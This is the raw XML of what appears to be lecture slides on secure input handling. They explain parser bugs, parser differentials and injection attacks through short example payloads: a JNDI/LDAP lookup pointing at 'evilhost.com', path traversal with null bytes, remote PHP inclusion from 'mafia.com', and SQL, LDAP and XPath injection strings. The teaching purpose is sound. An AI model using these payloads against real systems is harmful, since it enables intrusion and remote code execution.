                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory leaks,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RCE, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>even parser written in memory safe language can still </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crash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If the data being parsed is input, these bugs are exploitable!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input formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP, 2/3/4/5G,  Bluetooth, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, JPEG, PDF, HTML, Word, ...  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3399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 examples from the fuzzing lecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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671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(2): incorrect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Buggy parsing can also cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mis-interpretation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For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  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www.paypal.com\0.mafia.com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sz="1800" dirty="0"/>
              <a:t>in X.509 certificate                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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paypal.com,mafia.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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in X.509 certificate</a:t>
            </a:r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/>
              <a:t>For which domain is this JDNI loop-up?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${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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://127.0.0.1#.evilhost.com:1389/a}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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Aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parser differentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: two applications parse the same data differently, leading to exploitable misunderstandings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poorly specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats 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NL" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33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59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531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6226"/>
            <a:ext cx="7761288" cy="496886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Old-fashioned PHP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190" y="795373"/>
            <a:ext cx="7761288" cy="51041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PHP file injection          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http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?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../../admin/menu.php%00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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How would you get full Remote Code Execution (RCE)?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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP file injection   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with a file the attacker can control       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1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../../users/john/profile_pic.jpg%00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  PHP file injection          	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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                   http://company.nl/XYZ123/index.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B060602020203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http://mafia.com/attack.php</a:t>
            </a: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800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E6B-66FC-0E8A-BDE9-31DFBA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parsing (3): unwanted parsing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46A2-DD9F-1345-3BE9-F6AF4C39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Correct but intended parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can also cause security problems, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> parsing (and processing) of user input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as SQL command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as file path  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as OS command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>as HTML or JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>....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High risk for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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or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EXPRESSIVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats/language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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5BCA8-53B0-0B1D-5239-FF9DBA287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5639232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Typical injection attack,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SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400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F6ECECB-7A1A-4B54-B508-939C5DAF405F}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16390" name="Groep 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="694017" y="2585035"/>
            <a:ext cx="7475959" cy="2706909"/>
            <a:chOff x="915240" y="4427754"/>
            <a:chExt cx="8241563" cy="2983876"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Afgeronde rechthoek 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6934100" y="5967151"/>
              <a:ext cx="2222703" cy="1444479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Back-end service, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB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GB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 database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Explosie 2 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6753212" y="5905136"/>
              <a:ext cx="770158" cy="565861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pic>
          <p:nvPicPr>
            <p:cNvPr id="16404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40" y="4735048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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2057827" y="4973788"/>
              <a:ext cx="1457199" cy="3304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Afgeronde rechthoek 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3637262" y="4427754"/>
              <a:ext cx="2178811" cy="2983876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Application</a:t>
              </a:r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630027" y="5898872"/>
              <a:ext cx="1465509" cy="491085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7" name="Rechthoek 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6104328" y="605552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2" name="Tijdelijke aanduiding voor datum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Poll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5224" y="4246849"/>
            <a:ext cx="1965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5640368" y="4059842"/>
            <a:ext cx="144000" cy="16128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1" tIns="45715" rIns="91431" bIns="45715"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492074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Vrije vorm 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3189277" y="3090281"/>
            <a:ext cx="1807646" cy="1985870"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1606378"/>
              <a:gd name="connsiteY0" fmla="*/ 107640 h 1985870"/>
              <a:gd name="connsiteX1" fmla="*/ 1068860 w 1606378"/>
              <a:gd name="connsiteY1" fmla="*/ 27321 h 1985870"/>
              <a:gd name="connsiteX2" fmla="*/ 1161535 w 1606378"/>
              <a:gd name="connsiteY2" fmla="*/ 521591 h 1985870"/>
              <a:gd name="connsiteX3" fmla="*/ 247135 w 1606378"/>
              <a:gd name="connsiteY3" fmla="*/ 404202 h 1985870"/>
              <a:gd name="connsiteX4" fmla="*/ 240957 w 1606378"/>
              <a:gd name="connsiteY4" fmla="*/ 954078 h 1985870"/>
              <a:gd name="connsiteX5" fmla="*/ 648730 w 1606378"/>
              <a:gd name="connsiteY5" fmla="*/ 1096180 h 1985870"/>
              <a:gd name="connsiteX6" fmla="*/ 648730 w 1606378"/>
              <a:gd name="connsiteY6" fmla="*/ 744013 h 1985870"/>
              <a:gd name="connsiteX7" fmla="*/ 920578 w 1606378"/>
              <a:gd name="connsiteY7" fmla="*/ 1232105 h 1985870"/>
              <a:gd name="connsiteX8" fmla="*/ 599303 w 1606378"/>
              <a:gd name="connsiteY8" fmla="*/ 1658413 h 1985870"/>
              <a:gd name="connsiteX9" fmla="*/ 809368 w 1606378"/>
              <a:gd name="connsiteY9" fmla="*/ 1985867 h 1985870"/>
              <a:gd name="connsiteX10" fmla="*/ 1377778 w 1606378"/>
              <a:gd name="connsiteY10" fmla="*/ 1664591 h 1985870"/>
              <a:gd name="connsiteX11" fmla="*/ 1248033 w 1606378"/>
              <a:gd name="connsiteY11" fmla="*/ 1269175 h 1985870"/>
              <a:gd name="connsiteX12" fmla="*/ 1606378 w 1606378"/>
              <a:gd name="connsiteY12" fmla="*/ 1083824 h 19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378" h="1985870">
                <a:moveTo>
                  <a:pt x="0" y="107640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="437635" y="32984"/>
                  <a:pt x="875271" y="-41671"/>
                  <a:pt x="1068860" y="27321"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1262449" y="96313"/>
                  <a:pt x="1298489" y="458778"/>
                  <a:pt x="1161535" y="521591"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1024581" y="584405"/>
                  <a:pt x="400565" y="332121"/>
                  <a:pt x="247135" y="404202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93705" y="476283"/>
                  <a:pt x="174024" y="838748"/>
                  <a:pt x="240957" y="954078"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="307890" y="1069408"/>
                  <a:pt x="580768" y="1131191"/>
                  <a:pt x="648730" y="1096180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="716692" y="1061169"/>
                  <a:pt x="603422" y="721359"/>
                  <a:pt x="648730" y="744013"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="694038" y="766667"/>
                  <a:pt x="928816" y="1079705"/>
                  <a:pt x="920578" y="1232105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="912340" y="1384505"/>
                  <a:pt x="617838" y="1532786"/>
                  <a:pt x="599303" y="1658413"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="580768" y="1784040"/>
                  <a:pt x="679622" y="1984837"/>
                  <a:pt x="809368" y="1985867"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="939114" y="1986897"/>
                  <a:pt x="1304667" y="1784040"/>
                  <a:pt x="1377778" y="1664591"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1450889" y="1545142"/>
                  <a:pt x="1209933" y="1365970"/>
                  <a:pt x="1248033" y="1269175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1286133" y="1172380"/>
                  <a:pt x="1536357" y="1107508"/>
                  <a:pt x="1606378" y="1083824"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Lijnbijschrift 1 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1242828" y="1357725"/>
            <a:ext cx="1737238" cy="415091"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 97628"/>
              <a:gd name="adj2" fmla="val 38859"/>
              <a:gd name="adj3" fmla="val 443557"/>
              <a:gd name="adj4" fmla="val 5828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’OR 1=1;--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Lijnbijschrift 1 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4575129" y="1249665"/>
            <a:ext cx="3956142" cy="1129569"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 98752"/>
              <a:gd name="adj2" fmla="val 37862"/>
              <a:gd name="adj3" fmla="val 241807"/>
              <a:gd name="adj4" fmla="val 25926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SELECT * FROM </a:t>
            </a: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Accounts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Username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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OR 1=1;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GB" sz="18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AND Password = ’1234’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1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AF216-BEC1-1CD9-61F7-60A3F042052D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261949" y="5633135"/>
            <a:ext cx="702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Is this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input problem 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or an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i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output problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" i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9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8134672" cy="4960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General recipe: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user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is combined with other data and forwarded to &amp; processed by some back-end API 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Tell-tale sign 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>special characters or keywords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&lt; &gt; \ &amp;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Tell-tale sign 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use of   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strings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157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LDAP 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/>
              <a:t>An LDAP query sent to the LDAP server to authenticate a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/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abcd1234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)) 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can be corrupted by giving as username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dirty="0"/>
              <a:t>which results in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admin)(&amp;))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PASSWD=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where only first part is used,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>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is LDAP notation for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fld id="{AF2AEC77-7434-46CA-BE34-C63E21E2B0BF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11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XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1"/>
              <a:t>injection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/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>, 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student_database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jan&lt;/username&gt;&lt;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&gt;abcd1234&lt;/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&lt;username&gt;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kees&lt;/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nameuser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nl-N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&lt;student&gt;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&lt;/student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en-GB" dirty="0"/>
              <a:t>can be accessed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eg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(//student[username/text()='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 and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/text()='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abcd123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']/account/text())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_database&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which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can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be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corrupted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by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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or '1'='1'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40598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Blind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4745"/>
            <a:ext cx="7846640" cy="4960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cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL injection attack with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          http://a.com/xyz?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a: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ourier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=s1232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AND SUBSTRING(user,1,1) =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(Lack of) an error response reveals if username starts with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  <a:cs typeface="Courier New" pitchFamily="49" charset="0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In a blind injection attack, we’re only interested in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leakage of information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, not in the effect of the query (e.g. to corrupt data in database) or the actual response (e.g. to leak data from database).   </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33993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65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injection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The class of injection attacks is bigger than you may realise: </a:t>
            </a:r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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>format string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%n, %s, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks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special processing of serialised data representation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macros: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Word &amp; Excel containing Visual Basic (VBA)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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or other weird Office ‘features’!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>PDFs containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ActionScript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XML bombs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zip bombs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SMB relay attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with bizarre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>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3080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More obscure injection attacks on Microsoft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Attackers can trigger RCE in Office without normal (Visual Basic) macros, using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DDE (Dynamic Data Exchange)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Also possible with emails in Outlook Rich Text Format (RTF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>             https://sensepost.com/blog/2017/macro-less-code-exec-in-msword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Excel 4.0 macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Archaic legacy features that predate VBA  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://outflank.nl/blog/author/stan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/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Recall:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in data formats is bad</a:t>
            </a:r>
